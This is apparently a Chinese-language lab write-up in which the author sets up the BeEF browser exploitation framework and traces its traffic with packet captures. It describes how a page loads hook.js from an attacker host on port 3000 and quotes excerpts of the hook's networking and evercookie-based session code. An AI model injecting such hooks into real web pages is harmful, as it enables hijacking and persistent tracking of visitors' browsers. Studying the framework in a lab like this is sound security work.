搭建完了beef就想简答的抓下包分析下
这是第一个包,追踪它
返回demo页面,并发现其中的脚本
window.location.protocol表示协议http, window.location.host代表主机加端口号,红线的意思是调用http://主机:3000/hook.js
继续跟踪数据流,发现浏览器get请求了hook.js
继续跟踪数据流
返回hook.js
内容挺多的。。。看不懂
接着跟踪数据包,发现请求了提交了参数
到hook.js 里搜索dh,找到他的功能
/*! * @literal object: beef.net * * Provides basic networking functions, 提供基础的网络功能 * like beef.net.request and beef.net.forgeRequest, 像beef.net.request和beef.net.forgetRequest * used by BeEF command modules and the Requester extension, 被beef命令模块和扩展请求使用 * as well as beef.net.send which is used to return commands 返回命令 * to BeEF server-side components. beef的服务器端组件 * * Also, it contains the core methods used by the XHR-polling * mechanism (flush, queue) */ beef.net = { host: "192.168.170.132", port: "3000", hook: "/hook.js", httpproto: "http", handler: '/dh', chop: 500, pad: 30, //this is the amount of padding for extra params such as pc, pid and sid sid_count: 0, cmd_queue: [],
继续跟踪,
在hook.js 里搜索BEEFHOOK
/*! * @literal object: beef.session * * Provides basic session functions. 提供基础的session功能 */ beef.session = { hook_session_id_length: 80, hook_session_id_chars: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789", ec: new evercookie(), beefhook: "BEEFHOOK", /** * Gets a string which will be used to identify the hooked browser session * * @example: var hook_session_id = beef.session.get_hook_session_id(); */ get_hook_session_id: function() { // check if the browser is already known to the framework var id = this.ec.evercookie_cookie(beef.session.beefhook); if (typeof id == 'undefined') { var id = this.ec.evercookie_userdata(beef.session.beefhook); } if (typeof id == 'undefined') { var id = this.ec.evercookie_window(beef.session.beefhook); } // if the browser is not known create a hook session id and set it if ((typeof id == 'undefined') || (id == null)) { id = this.gen_hook_session_id(); this.set_hook_session_id(id); } // return the hooked browser session identifier return id; },
之后的包就是在不断请求重复后两个
随便玩一个功能
效果:
查看数据包
在某次请求hook.js后发生变化
相应的包
可以看到我填写的攻击参数